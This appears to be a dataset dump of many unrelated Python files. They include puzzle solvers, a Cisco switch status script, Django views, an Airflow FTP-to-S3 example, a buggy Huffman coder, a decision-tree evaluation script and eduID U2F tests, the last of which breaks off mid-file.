text
stringlengths
38
1.54M
# Day 18, Part 1: Operation Order import collections def find_match(expr): stack = collections.deque() idx = expr.index("(") for i, x in enumerate(expr): if x == "(": stack.appendleft((i, x)) elif x == ")": stack.popleft() if not stack: return idx, i def evaluate(expr): if "(" in expr: start, end = find_match(expr) val = evaluate(expr[start+1:end]) return evaluate(expr[:start] + [str(val)] + expr[end+1:]) while len(expr) > 1: expr = [str(eval(" ".join(expr[:3])))] + expr[3:] return expr[0] if __name__ == "__main__": with open("inp.txt") as infile: INP = infile.read().strip() EXPRS = [list(line.replace(" ", "")) for line in INP.split("\n")] total = sum(int(evaluate(expr)) for expr in EXPRS) print(total)
from __future__ import print_function from netmiko import ConnectHandler import sys import time import select import paramiko import re fd = open(r'C:\Users\J0000049\NewdayTest.txt','w') old_stdout = sys.stdout sys.stdout = fd platform = 'cisco_ios' username = 'admin-j0000049' password = 'xxxxx' ip_add_file = open(r'C:\Users\J0000049\DC Switchevi.txt','r') for host in ip_add_file: device = ConnectHandler(device_type=platform, ip=host, username=username, password=password) output = device.send_command('terminal length 0') output = device.send_command('enable') print('##############################################################\n') print('...................CISCO COMMAND SHOW UPTIME......................\n') output = device.send_command('sh ver | include uptime') print(output) print('...................CISCO COMMAND SHOW IP NAME SERVER...............\n') output = device.send_command('sh ip name-server') print('##############################################################\n') print(output) fd.close()
import py_compile import sys try: print(py_compile.compile(sys.argv[1])) except IndexError as e: raise e
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import streamlit as st from smart_hr.data import load_data as load from smart_hr.data.dismissal import load as load_dismissal from smart_hr.data.activity import load as load_activities @st.cache def load_data(data_dir, models_dir): ''' ''' excel_filename = os.path.join(data_dir, "hr.xls") load(excel_filename) dismissal_filename = os.path.join(data_dir, "dismissal.csv") feature_importance_filename = os.path.join(models_dir, "feature_importance.csv") load_dismissal(dismissal_filename, feature_importance_filename) activities_filename = os.path.join(data_dir, "activities.csv") load_activities(activities_filename)
from django.db import DataError from drf_standardized_errors.formatter import ExceptionFormatter from drf_standardized_errors.handler import ExceptionHandler from drf_standardized_errors.types import ErrorResponse, ErrorType from metering_billing.exceptions.exceptions import DatabaseOperationFailed class CustomHandler(ExceptionHandler): def convert_known_exceptions(self, exc: Exception) -> Exception: if isinstance(exc, DataError): return DatabaseOperationFailed() else: return super().convert_known_exceptions(exc) class RFC7807Formatter(ExceptionFormatter): def format_error_response(self, error_response: ErrorResponse): error = error_response.errors[0] if error_response.type == ErrorType.VALIDATION_ERROR: url_error_type = "validation-error" elif error_response.type == ErrorType.CLIENT_ERROR: url_error_type = "client-error" elif error_response.type == ErrorType.SERVER_ERROR: url_error_type = "server-error" return_d = { "type": f"https://docs.uselotus.io/errors/error-responses#{url_error_type}", "detail": error.detail, "title": error.code, } if ( len(error_response.errors) > 1 or error_response.type == ErrorType.VALIDATION_ERROR ): return_d["validation_errors"] = [ {"code": x.code, "detail": x.detail, "attr": x.attr} for x in error_response.errors ] return return_d
""" ISCG5421 Practice Test - Semester 2 2020 Kris Pritchard - @krp pytest -v test_contact_tracer.py """ import pytest import contact_tracer def test_that_location_id_is_added_to_visited_set(): brown = contact_tracer.Person('brown@unitec.ac.nz') brown.visit(123) assert 123 in brown.visited def test_that_invalidlocation_is_raised_if_negative_location_id(): brown = contact_tracer.Person('brown@unitec.ac.nz') with pytest.raises(contact_tracer.InvalidLocation): brown.visit(-1) def test_num_visited_locations_is_zero_if_no_visits(): ben = contact_tracer.Person('ben@unitec.ac.nz') num_location_visited = ben.num_locations_visited() assert num_location_visited == 0 def test_num_locations_visited_gt_zero_if_visited_locations(): wipun = contact_tracer.Person('wipun@unitec.ac.nz') wipun.visit(1000) num_locations_visited = wipun.num_locations_visited() assert num_locations_visited == 1 def test_assert_has_contact_returns_true_for_two_people_with_contact(): wipun = contact_tracer.Person('wipun@unitec.ac.nz') ben = contact_tracer.Person('ben@unitec.ac.nz') wipun.visit(500) ben.visit(500) wipun_has_had_contact_with_ben = wipun.has_contact(ben) assert wipun_has_had_contact_with_ben == True def test_assert_has_contact_returns_false_for_two_people_without_contact(): wipun = contact_tracer.Person('wipun@unitec.ac.nz') ben = contact_tracer.Person('ben@unitec.ac.nz') wipun.visit(1000) ben.visit(500) wipun_has_had_contact_with_ben = wipun.has_contact(ben) assert wipun_has_had_contact_with_ben == False def test_notify_returns_all_caps(): wipun = contact_tracer.Person('wipun@unitec.ac.nz') notification = wipun._notify() assert notification == 'WIPUN@UNITEC.AC.NZ'
from marshmallow import * from ..utils import * # ===================================================================== # Report class Report(Schema): class Meta: dateformat = ('iso') fields = ('day', 'count') class Problems(Schema): class Meta: fields = ('branch_indiference', 'camera_broken', 'app_broken', 'qr_lost', 'names', 'surnames', 'email', 'branch_name', 'coupon_name') report_schema = Report(many=True) report_problems_schema = Problems(many=True)
import heapq class Huffman(object): def __init__(self, freq, char=None, left=None, right=None): self.char = char self.freq = freq self.left = left self.right = right def __repr__(self): return "Huffman(char=%s, freq=%s)" % (self.char, self.freq) # needed for node comparison. Utilized to order the nodes appropriately # in the priority queue def __lt__(self, other): return self.freq < other.freq def isLeaf(self): return (self.left == None and self.right == None) def maketree(frequencies): heap = [] for char in frequencies: heapq.heappush(heap, char) while (len(heap) > 1): child0 = heapq.heappop(heap) child1 = heapq.heappop(heap) parent = Huffman(child0.freq + child1.freq, left=child0, right=child1) heapq.heappush(heap, parent) return None if heap == [] else heapq.heappop(heap) def makecodemap(codetree): codemap = dict() walktree(codetree, codemap,'') return codemap def walktree(codetree, codemap, codeprefix): if (len(codetree == 1)): freq, label = codetree[0] codemap[label] = codeprefix else: value, child0, child1 = codetree walktree(child0, codemap, codeprefix + "0") walktree(child1, codemap, codeprefix + "1") def encode(message, frequencies): codemap = makecodemap(maketree(frequencies)) return ''.join([codemap(letter) for letter in message]) def decode(encodedmessage, frequencies): codetree = entiretree = maketree(frequencies) decodedletters = [] for digit in encodedmessage: if (digit == '0'): codetree = codetree[1] else: codetree = codetree[2] if (len(codetree) == 1): frequency, label = codetree[0] decoded.append(label) codetree = entiretree return ''.join(decoded) tree=maketree(frequencies) frequencies = {"a":7, "b":2, "c":1, "d":1, "e":2} message = "abacdaebfaabd" encoded = encode(message, frequencies) print("encoded", encoded) encoded = '010101110101001000100010001' decoded = decode(encoded, frequencies) print("decoded", decoded)
#!/usr/bin/env python3 from abc import ABC, abstractmethod from functools import wraps from typing import Callable class Parameter(ABC): def __init__(self, i_0: int, c: float, d: float, kappa: int, omega: int, **kwargs): """ Every model involves the same mutation model (for now). This involves the parameters i_0, c, d, and our bounds [kappa, omega]. Model specific parameters are specified in the kwargs argument. Call of base constructor must use keyword arguments. :param i_0: Common ancestor repeat length (where to start mutating from). :param c: Constant bias for the upward mutation rate. :param d: Linear bias for the downward mutation rate. :param kappa: Lower bound of repeat lengths. :param omega: Upper bound of repeat lengths. """ self.i_0, self.c, self.d, self.kappa, self.omega = i_0, c, d, kappa, omega # Set our model specific parameters. self.__dict__.update(kwargs) def __iter__(self): """ Return each our of parameters in the constructor order. :return: Iterator for all of our parameters. """ for parameter in self.__dict__: yield parameter def __len__(self): """ The number of parameters that exist here. :return: The number of parameters we have. """ return len(self.__dict__) @classmethod def from_namespace(cls, arguments, transform: Callable = lambda a: a): """ Given a namespace, return a Parameters object with the appropriate parameters. Transform each attribute (e.g. add a suffix or prefix) if desired. :param arguments: Arguments from some namespace. :param transform: Function to transform each attribute, given a string and returning a string. :return: New Parameters object with the parsed in arguments. """ from inspect import getfullargspec return cls(*list(map(lambda a: getattr(arguments, transform(a)), getfullargspec(cls.__init__).args[1:]))) @abstractmethod def validity(self) -> bool: """ Determine if a current parameter set is valid. :return: True if valid. False otherwise. """ raise NotImplementedError @classmethod def walkfunction(cls, func: Callable) -> Callable: """ Decorator to apply validity constraints to a given walk function (generating a new point given a current point and variables describing it's randomness). :param func: Walk function. :return: Function that will generate new points that are valid. """ @wraps(func) def _walkfunction(*args, **kwargs): while True: theta_proposed = cls(**func(*args, **kwargs).__dict__) if theta_proposed.validity(): # Only return if the parameter set is valid. return theta_proposed return _walkfunction
from operator import attrgetter class PostSort: def select_sort_method(self, sort_id, post_collection): if sort_id == "1": return self.sort_latestPost(post_collection) elif sort_id == "2": return self.sort_oldestPost(post_collection) elif sort_id == "3": return self.sort_mostFav(post_collection) elif sort_id == "4": return self.sort_leastFav(post_collection) elif sort_id == "5": return self.sort_mostComment(post_collection) elif sort_id == "6": return self.sort_leastComment(post_collection) elif sort_id == "7": return self.sort_mostSaves(post_collection) elif sort_id == "8": return self.sort_leastSaves(post_collection) else: return -1 def sort_latestPost(self, posts): posts.sort(key=attrgetter('postTime'), reverse=True) return posts def sort_oldestPost(self, posts): posts.sort(key=attrgetter('postTime')) return posts def sort_mostFav(self, posts): posts.sort(key=attrgetter('postLikes'), reverse=True) return posts def sort_leastFav(self, posts): posts.sort(key=attrgetter('postLikes')) return posts def sort_mostComment(self, posts): posts.sort(key=attrgetter('postReplies'), reverse=True) return posts def sort_leastComment(self, posts): posts.sort(key=attrgetter('postReplies')) return posts def sort_mostSaves(self, posts): posts.sort(key=attrgetter('postSaves'), reverse=True) return posts def sort_leastSaves(self, posts): posts.sort(key=attrgetter('postSaves')) return posts
import os import re import numpy as np import swr est = re.compile('estimated',re.IGNORECASE) xsec_files = os.listdir('xsec\\') for xf in xsec_files: if est.search(xf) != None: h,xsec = swr.load_xsec('xsec\\'+xf) raw = h[0].split() npt,x,y,area = int(raw[-4]),float(raw[-3]),float(raw[-2]),float(raw[-1]) print xf,xsec[:,1].min() if xsec[:,1].min() > -1.0: xsec[np.where(xsec[:,1] == xsec[:,1].min()),1] = -1.0 h_new = ' {0:10d} {1:10.3e} {2:10.3e} {3:10.3e} '.format(xsec.shape[0],x,y,area) name_new = xf.replace('ESTIMATED','LOWERED') swr.write_profile('xsec\\'+name_new,xsec,h_new)
#!/usr/bin/python def palindrome (n) : s = str(n) for i in range(len(s)/2) : if s[i] != s[-(i+1)] : return 0 return 1 # print palindrome (22) # print palindrome (23) # print palindrome (202) # print palindrome (2002) l = 0 for a in range (100,1000) : for b in range (100,1000) : prod = a*b if palindrome(prod) : if prod > l : l = prod print l
import math import os.path import random random.seed() from sklearn import tree from sklearn.ensemble import RandomForestClassifier import numpy as np import pandas as pd import plotly.plotly as py import plotly.graph_objs as go import pydotplus from IPython.display import Image import input_old import cPickle # csvs2 = [f for f in os.listdir('ml2/data/fa15/op+context+type') if f.endswith('.csv')] csvs = [f for f in os.listdir('ml2/data/sp14/op+context+type') if f.endswith('.csv')] random.shuffle(csvs) dfs = [] test = [] ##train = [] # for csv in csvs2: # df, fs, ls = input_old.load_csv(os.path.join('ml2/data/fa15/op+context+type', csv), filter_no_labels=True, only_slice=False) # if df is None: # continue # if df.shape[0] == 0: # continue # train.append(df) for csv in csvs: df2, fs2, ls2 = input_old.load_csv(os.path.join('ml2/data/sp14/op+context+type', csv), filter_no_labels=True, only_slice=False) if df2 is None: continue if df2.shape[0] == 0: continue test.append(df2) ##train = pd.concat(train) test = pd.concat(test) #print (len(test)) #print (len(train)) ##classes = list(train.groupby(ls2)) #print(ls) #max_samples = max(len(c) for _, c in classes) ## train = pd.concat(c.sample(max_samples, replace=True) for _, c in classes)# max_samples = max(len(c) for _, c in classes) ## train = pd.concat(c.sample(max_samples, replace=True) for _, c in classes) #print (len(train)) #print df.shape #print type(df) #list_keys = [ k for k in df ] #print list_keys # print samps #print sum(df['L-DidChange'].values) # print df['L-DidChange'].index ##train_samps = train.loc[:,'F-Is-Eq' :] ##train_labels = train.loc[:,'L-DidChange'] # print test test_samps = test.loc[:,'F-Is-Eq' :] test_labels = test.loc[:,'L-DidChange'] test_span = test.loc[:,'SourceSpan'] # print test.iloc[1] # print test.values[1] feature_names = fs2[1:] # dflist = [] # keylist = [] # for key, value in df.iteritems(): # temp = value # tempk = key # dflist.append(temp) # keylist.append(tempk) # Y = dflist[0] # X = dflist[2:] #-----Making classifier #estimator = RandomForestClassifier(n_estimators=30) # estimator = tree.DecisionTreeClassifier() # estimator = estimator.fit(train_samps.values, train_labels.values) # print anses # print test_labels.values # print sum(anses)/len(anses) # print sum(test_labels.values)/len(test_labels.values) #------- Saving # with open('my_dumped_classifier.pkl', 'wb') as fid: # cPickle.dump(estimator, fid) #------- Loading with open('my_dumped_classifier.pkl', 'rb') as fid: estimator = cPickle.load(fid) #------- Predicting anses = estimator.predict(test_samps.values) #-------importances # imps = estimator.feature_importances_ # imp_features = [(y,x) for (y,x) in sorted(zip(imps,feature_names))] # imp_features.reverse() # for elem in imp_features: # print elem #------------------ #testanses =test_labels.values resacc = anses + 2*test_labels.values acc = 1-((sum(abs(anses - test_labels.values)))/3600) lol = test_labels.add((-1)*anses) #print lol #print map(lambda x : estimator.predict_proba(x), test_samps.values) prob_score = estimator.predict_proba(test_samps.values) prob_error = [item[1] for item in prob_score] conf = np.array(prob_error)-0.5 posconf = filter(lambda x: x > 0, conf) negconf = filter(lambda x: x < 0, conf) print (np.mean(posconf)) print (np.mean(negconf)) ll = zip(prob_error, anses, test_labels.values, test_span) score = pd.DataFrame(data=ll, index=test_labels.index, columns=['Error Probability','predictions', 'actual' ,'SourceSpan']) # print score # print 'recall is ' + str(sum(anses * test_labels.values)/sum(test_labels.values)) # print 'precision is ' + str(sum(anses * test_labels.values)/sum(anses)) yay1 = 0 yay2 = 0 yay3 = 0 tots = 0 tp = 0 for labelind in list(set(test_labels.index)): #print labelind temp = score.loc[labelind] temp = temp.values # print labelind if len(temp) < 3: continue tots = tots+1 topn = temp[np.argsort(temp[:,0])] #Writing into file # filenm = str(labelind).split('.') # f = open('decisiontree_results/' + filenm[0] +'.out', "w+") # for preds in topn: # if preds[1] == 1: # f.write(str(preds[3]) + '\n') # f.close() # print topn # print 'lol' # print topn[-3:] a3 = 0 a2 = 0 a1 = 0 if (topn[-3][1] == 1 and topn[-3][2] == 1) : a3 = 1 tp = tp+1 if (topn[-2][1] == 1 and topn[-2][2] == 1) : a3 = 1 a2 = 1 tp = tp+1 if (topn[-1][1] == 1 and topn[-1][2] == 1) : a3 = 1 a2 = 1 a1 = 1 tp = tp+1 yay1 = yay1+a1 yay2 = yay2+a2 yay3 = yay3+a3 print "precision for top 3" print 'top 1' print float(yay1)/tots print 'top 2' print float(yay2)/tots print 'top 3' print float(yay3)/tots # print tots # print tp # print sum(test_labels.values) print "recall for top 3" print tp/sum(test_labels.values) # # -----PLOTTING # dot_data = tree.export_graphviz(estimator, out_file=None, # feature_names=feature_names, # filled=True, # rounded=True) # graph = pydotplus.graph_from_dot_data(dot_data) # graph.write_png('plot0865.png') # --------- # graph.render(filename='img/g1') # graph.write_pdf("smallfa15.pdf") # -------------- X_test = test_samps.values # Using those arrays, we can parse the tree structure: n_nodes = estimator.tree_.node_count children_left = estimator.tree_.children_left children_right = estimator.tree_.children_right feature = estimator.tree_.feature threshold = estimator.tree_.threshold # The tree structure can be traversed to compute various properties such # as the depth of each node and whether or not it is a leaf. # node_depth = np.zeros(shape=n_nodes) # is_leaves = np.zeros(shape=n_nodes, dtype=bool) # stack = [(0, -1)] # seed is the root node id and its parent depth # while len(stack) > 0: # node_id, parent_depth = stack.pop() # node_depth[node_id] = parent_depth + 1 # # If we have a test node # if (children_left[node_id] != children_right[node_id]): # stack.append((children_left[node_id], parent_depth + 1)) # stack.append((children_right[node_id], parent_depth + 1)) # else: # is_leaves[node_id] = True # print("The binary tree structure has %s nodes and has " # "the following tree structure:" # % n_nodes) # for i in range(n_nodes): # if is_leaves[i]: # print("%snode=%s leaf node." % (node_depth[i] * "\t", i)) # else: # print("%snode=%s test node: go to node %s if X[:, %s] <= %ss else to " # "node %s." # % (node_depth[i] * "\t", # i, # children_left[i], # feature[i], # threshold[i], # children_right[i], # )) # print() #i = n_nodes # lol loop # First let's retrieve the decision path of each sample. The decision_path # method allows to retrieve the node indicator functions. A non zero element of # indicator matrix at the position (i, j) indicates that the sample i goes # through the node j. node_indicator = estimator.decision_path(X_test) # Similarly, we can also have the leaves ids reached by each sample. leave_id = estimator.apply(X_test) # Now, it's possible to get the tests that were used to predict a sample or # a group of samples. First, let's make it for the sample. # sample_id = 50 # node_index = node_indicator.indices[node_indicator.indptr[sample_id]: # node_indicator.indptr[sample_id + 1]] # print('Rules used to predict sample %s: ' % sample_id) # for node_id in node_index: # if leave_id[sample_id] != node_id: # continue # if (X_test[sample_id, feature[node_id]] <= threshold[node_id]): # threshold_sign = "<=" # else: # threshold_sign = ">" # print("decision id node %s : (X[%s, %s] (= %s) %s %s)" # % (node_id, # sample_id, # feature[node_id], # X_test[sample_id, feature[node_id]], # threshold_sign, # threshold[node_id])) #print (estimator.decision_path(X_test[50])) samp_indsb = test_samps.index.get_loc(1655.0) samp_inds = [i for i, x in enumerate(samp_indsb) if x] for ind in samp_inds: print ('our prediction') print (estimator.predict(X_test[ind])) print ('should be') print (test_labels.values[ind]) sample_id = ind # print X_test[sample_id] node_index = node_indicator.indices[node_indicator.indptr[sample_id]: node_indicator.indptr[sample_id + 1]] print('Rules used to predict sample %s: ' % sample_id) for node_id in node_index: if leave_id[sample_id] == node_id: # <-- changed != to == #continue # <-- comment out print("leaf node {} reached, no decision here".format(leave_id[sample_id])) # <-- else: # < -- added else to iterate through decision nodes if (X_test[sample_id, feature[node_id]] <= threshold[node_id]): threshold_sign = "<=" else: threshold_sign = ">" print("decision id node %s : (X[%s, %s] (= %s) %s %s)" % (node_id, sample_id, feature[node_id], X_test[sample_id, feature[node_id]], # <-- changed i to sample_id threshold_sign, threshold[node_id])) print(feature_names[feature[node_id]]); print(test_span.values[ind])
# coding: utf8 from __future__ import absolute_import, unicode_literals def make_response(info='error', code=1, extra={}): res = { 'code': code, 'info': info, } res.update(extra) return res def success_response(info, extra={}): res = { 'code': 0, 'info': info, } res.update(extra) return res SUCCESS_RESPONSE = make_response(info='SUCCESS', code=0)
# Define variables my_kitchen = 18.0 your_kitchen = 14.0 # my_kitchen bigger than 10 and smaller than 18? print(my_kitchen>10 and my_kitchen<18) # my_kitchen smaller than 14 or bigger than 17? print(my_kitchen<14 or my_kitchen>17) # Double my_kitchen smaller than triple your_kitchen? print((my_kitchen*2)< (your_kitchen*3))
# Tony Liang and hari Shanmugaraja # Feb 9 2020 # read in text file for lidar and text file for car motor and steering and match them up # sample line # 1581083570.228828 b'8597 1407\r\n' # # # Ultra simple LIDAR data grabber for RPLIDAR. # Version: 1.10.0 # 1582122195.06 # RPLIDAR S/N: BE9B9AF2C1EA98D4BEEB9CF031483517 # Firmware Ver: 1.25 # Hardware Rev: 5 # RPLidar health status : 0 # theta: 0.30 Dist: 00781.00 Q: 47 # theta: 1.05 Dist: 00780.00 Q: 47 # theta: 1.55 Dist: 00789.00 Q: 47 # theta: 2.17 Dist: 00782.00 Q: 47 # theta: 3.09 Dist: 00000.00 Q: 0 # theta: 3.55 Dist: 01044.00 Q: 47 #output: big list: inside list: 360 (theta, dist) tuples followed by motor, steering import sys import random import subprocess #import serial import time import os import signal import pickle filename = sys.argv[1] def main(): with open(filename, "rb") as infile: inputandoutput = pickle.load(infile) outputonly = pickle.load(infile) #for i in inputandoutput: # print(i) #for o in outputonly: # print(o) print (inputandoutput[0]) print (outputonly[0]) if __name__ == "__main__": main()
import base64 import json import os from django.conf import settings from django.core.exceptions import ImproperlyConfigured from gapc_storage.storage import GoogleCloudStorage from oauth2client.client import SERVICE_ACCOUNT from oauth2client.service_account import ServiceAccountCredentials class ECGoogleCloudStorage(GoogleCloudStorage): """ Custom subclass of GoogleCloudStorage to interact with Eldarion Cloud To create: ec instances env GCS_CREDENTIALS=$(cat key.json | base64) GCS_BUCKET=<bucket> """ path_prefix = settings.MEDIA_PREFIX def get_oauth_credentials(self): client_credentials = json.loads(base64.b64decode(os.environ["GCS_CREDENTIALS"])) if client_credentials["type"] == SERVICE_ACCOUNT: creds = ServiceAccountCredentials.from_json_keyfile_dict(client_credentials) else: raise ImproperlyConfigured("non-service accounts are not supported") return self.create_scoped(creds)
#!/usr/bin/env python3 import os import subprocess import urllib.request pb_files = [ 'proto/message.proto', ] for f in pb_files: subprocess.check_call([ #os.path.join(self.getdir(), 'generator-bin', 'protoc'), 'protoc', '--proto_path=proto', '--python_out='+os.path.join('src', 'prex'), f ])
import csv products = [[121, 'ABC123', 'Highlight pen', 231, 0.56], [123, 'PQR678', 'Nietmachine', 587, 9.99], [128, 'ZYX163', 'Bureaulamp', 34, 19.95], [137, 'MLK709', 'Monitorstandaard', 66, 32.50], [271, 'TRS665', 'Ipad hoes', 155, 19.01]] with open('products.csv', 'r+', newline='') as csv_file: csv_writer = csv.writer(csv_file, delimiter=",") csv_writer.writerow(["Product#", "Product-code", "Name", "Stock", "Price"]) for p in products: csv_writer.writerow(p) lines = [] with open("products.csv", "r") as csv_file: csv_reader = csv.reader(csv_file, delimiter=",") [lines.append(line) for line in csv_reader] lowest_count = 'unset' highest_price = 0 total_products = 0 most_expensive_product = [] for line in lines[1:]: count = int(line[3]) if lowest_count == 'unset': lowest_count = count lowest_count_product = line elif lowest_count > count: lowest_count = count lowest_count_product = line if float(line[4]) > highest_price: highest_price = float(line[4]) most_expensive_product = line total_products += int(line[3]) print('Het duurste artikel is', most_expensive_product[2], 'en die kost', most_expensive_product[4]) print("Er zijn slechts", lowest_count_product[3], "exemplaren in voorraad van het product met nummer", lowest_count_product[0]) print('In totaal hebben wij', total_products, 'producten in ons magazijn liggen')
from appliances import DishWasher, Washer, Dryer, Refrigerator, CoffeeMaker, CanOpener, Stove whirlpool_dishwasher = DishWasher("black") whirlpool_dishwasher.wash_dishes() samsung_washer = Washer("red", "electric") samsung_dryer = Dryer("red", "gas") lg_fridge = Refrigerator("stainless") lg_fridge.make_ice() mr_coffee = CoffeeMaker("white") mr_coffee.make_coffee() cranky_canopener = CanOpener("black") cranky_canopener.open_can() # added the stove for fun ge_stove = Stove("Stainless Steel") ge_stove.bake_cookies()
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from __future__ import annotations from datetime import datetime from airflow import models from airflow.models.baseoperator import chain from airflow.providers.amazon.aws.operators.s3 import S3CreateBucketOperator, S3DeleteBucketOperator from airflow.providers.amazon.aws.transfers.ftp_to_s3 import FTPToS3Operator from airflow.utils.trigger_rule import TriggerRule from tests.system.providers.amazon.aws.utils import SystemTestContextBuilder sys_test_context_task = SystemTestContextBuilder().build() DAG_ID = "example_ftp_to_s3" with models.DAG( DAG_ID, schedule="@once", start_date=datetime(2021, 1, 1), catchup=False, tags=["example"], ) as dag: test_context = sys_test_context_task() env_id = test_context["ENV_ID"] s3_bucket = f"{env_id}-ftp-to-s3-bucket" s3_key = f"{env_id}-ftp-to-s3-key" create_s3_bucket = S3CreateBucketOperator(task_id="create_s3_bucket", bucket_name=s3_bucket) # [START howto_transfer_ftp_to_s3] ftp_to_s3_task = FTPToS3Operator( task_id="ftp_to_s3_task", ftp_path="/tmp/ftp_path", s3_bucket=s3_bucket, s3_key=s3_key, replace=True, ) # [END howto_transfer_ftp_to_s3] delete_s3_bucket = S3DeleteBucketOperator( task_id="delete_s3_bucket", bucket_name=s3_bucket, force_delete=True, trigger_rule=TriggerRule.ALL_DONE, ) chain( # TEST SETUP test_context, create_s3_bucket, # TEST BODY ftp_to_s3_task, # TEST TEARDOWN delete_s3_bucket, ) from tests.system.utils.watcher import watcher # This test needs watcher in order to properly mark success/failure # when "tearDown" task with trigger rule is part of the DAG list(dag.tasks) >> watcher() from tests.system.utils import get_test_run # noqa: E402 # Needed to run the example DAG with pytest (see: tests/system/README.md#run_via_pytest) test_run = get_test_run(dag)
from django.views.generic import ListView, DetailView, FormView, CreateView, UpdateView from webapp.models import Article, User, Comment from webapp.forms import ArticleSearchForm, ArticleForm, CommentForm, UpdateCommentForm from django.urls import reverse_lazy, reverse from django.shortcuts import get_object_or_404 class ArticleListView(ListView, FormView): template_name = 'index.html' model = Article form_class = ArticleSearchForm def get_queryset(self): article_name = self.request.GET.get('article_name') if article_name: return self.model.objects.filter(title__icontains=article_name) | self.model.objects.filter(text__icontains=article_name) else: return self.model.objects.all() class ArticleDetailView(DetailView): template_name = 'article_view.html' model = Article class UserListView(ListView): template_name = 'users_view.html' model = User class UserDetailView(DetailView): template_name = 'usr_view.html' model = User class ArticleCreateView(CreateView): model = Article template_name = 'article_create.html' form_class = ArticleForm success_url = reverse_lazy('index') class ArticleUpdateView(UpdateView): model = Article template_name = 'article_update.html' form_class = ArticleForm success_url = reverse_lazy('index') class CommentCreateView(CreateView): model = Comment template_name = 'comment_create.html' form_class = CommentForm def get_success_url(self): return reverse('article_view', kwargs={'pk': self.object.commented_to.pk}) def form_valid(self, form): form.instance.commented_to = get_object_or_404(Article, pk=self.kwargs['pk']) return super().form_valid(form) class CommentUpdateView(UpdateView): model = Comment template_name = 'comment_update.html' form_class = UpdateCommentForm def get_success_url(self): return reverse('article_view', kwargs={'pk': self.object.commented_to.pk})
# -*- coding: utf-8 -*- import json from typing import Any, Dict, Mapping from mock import patch from u2flib_server.model import DeviceRegistration, RegisteredKey from eduid_common.api.testing import EduidAPITestCase from eduid_userdb.credentials import U2F from eduid_webapp.security.app import SecurityApp, security_init_app __author__ = 'lundberg' class SecurityU2FTests(EduidAPITestCase): app: SecurityApp def load_app(self, config: Mapping[str, Any]) -> SecurityApp: """ Called from the parent class, so we can provide the appropriate flask app for this test case. """ return security_init_app('testing', config) def update_config(self, config: Dict[str, Any]) -> Dict[str, Any]: config.update( { 'available_languages': {'en': 'English', 'sv': 'Svenska'}, 'msg_broker_url': 'amqp://dummy', 'am_broker_url': 'amqp://dummy', 'celery_config': {'result_backend': 'amqp', 'task_serializer': 'json'}, 'u2f_app_id': 'https://eduid.se/u2f-app-id.json', 'u2f_max_allowed_tokens': 2, 'u2f_max_description_length': 50, 'fido2_rp_id': 'https://test.example.edu', 'u2f_valid_facets': ['https://test.example.edu'], 'vccs_url': 'https://vccs', 'dashboard_url': 'https://localhost', } ) return config def add_token_to_user(self, eppn: str): user = self.app.central_userdb.get_user_by_eppn(eppn) u2f_token = U2F( version='version', keyhandle='keyHandle', app_id='appId', public_key='publicKey', attest_cert='cert', description='description', created_by='eduid_security', ) user.credentials.add(u2f_token) self.app.central_userdb.save(user) return u2f_token def test_enroll_first_key(self): response = self.browser.get('/u2f/enroll') self.assertEqual(response.status_code, 302) # Redirect to token service eppn = self.test_user_data['eduPersonPrincipalName'] with self.session_cookie(self.browser, eppn) as client: response2 = client.get('/u2f/enroll') with client.session_transaction() as sess: self.assertIsNotNone(sess['_u2f_enroll_']) u2f_enroll = json.loads(sess['_u2f_enroll_']) self.assertEqual(u2f_enroll['appId'], 'https://eduid.se/u2f-app-id.json') self.assertEqual(u2f_enroll['registeredKeys'], []) self.assertIn('challenge', u2f_enroll['registerRequests'][0]) self.assertIn('version', u2f_enroll['registerRequests'][0]) enroll_data = json.loads(response2.data) self.assertEqual(enroll_data['type'], 'GET_U2F_U2F_ENROLL_SUCCESS') self.assertEqual(enroll_data['payload']['appId'], 'https://eduid.se/u2f-app-id.json') self.assertEqual(enroll_data['payload']['registeredKeys'], []) self.assertIn('challenge', enroll_data['payload']['registerRequests'][0]) self.assertIn('version', enroll_data['payload']['registerRequests'][0]) def test_enroll_another_key(self): response = self.browser.get('/u2f/enroll') self.assertEqual(response.status_code, 302) # Redirect to token service eppn = self.test_user_data['eduPersonPrincipalName'] _ = self.add_token_to_user(eppn) with self.session_cookie(self.browser, eppn) as client: response2 = client.get('/u2f/enroll') with client.session_transaction() as sess: self.assertIsNotNone(sess['_u2f_enroll_']) u2f_enroll = json.loads(sess['_u2f_enroll_']) self.assertEqual(u2f_enroll['appId'], 'https://eduid.se/u2f-app-id.json') self.assertEqual( u2f_enroll['registeredKeys'], [{u'keyHandle': u'keyHandle', u'version': u'version', u'appId': u'appId'}], ) self.assertIn('challenge', u2f_enroll['registerRequests'][0]) self.assertIn('version', u2f_enroll['registerRequests'][0]) enroll_data = json.loads(response2.data) self.assertEqual(enroll_data['type'], 'GET_U2F_U2F_ENROLL_SUCCESS') self.assertEqual(enroll_data['payload']['appId'], 'https://eduid.se/u2f-app-id.json') self.assertEqual( enroll_data['payload']['registeredKeys'], [{u'keyHandle': u'keyHandle', u'version': u'version', u'appId': u'appId'}], ) self.assertIn('challenge', enroll_data['payload']['registerRequests'][0]) self.assertIn('version', enroll_data['payload']['registerRequests'][0]) @patch('cryptography.x509.load_der_x509_certificate') @patch('OpenSSL.crypto.dump_certificate') @patch('u2flib_server.model.U2fRegisterRequest.complete') @patch('eduid_common.api.am.AmRelay.request_user_sync') def test_bind_key(self, mock_request_user_sync, mock_u2f_register_complete, mock_dump_cert, mock_load_cert): mock_dump_cert.return_value = b'der_cert' mock_load_cert.return_value = b'pem_cert' mock_request_user_sync.side_effect = self.request_user_sync mock_u2f_register_complete.return_value = ( DeviceRegistration( version='mock version', keyHandle='mock keyhandle', appId='mock app id', publicKey='mock public key', transports='mock transport', ), 'mock certificate', ) response = self.browser.post('/u2f/bind', data={}) self.assertEqual(response.status_code, 302) # Redirect to token service eppn = self.test_user_data['eduPersonPrincipalName'] with self.session_cookie(self.browser, eppn) as client: enroll_response = client.get('/u2f/enroll') csrf_token = json.loads(enroll_response.data)['payload']['csrf_token'] data = { 'csrf_token': 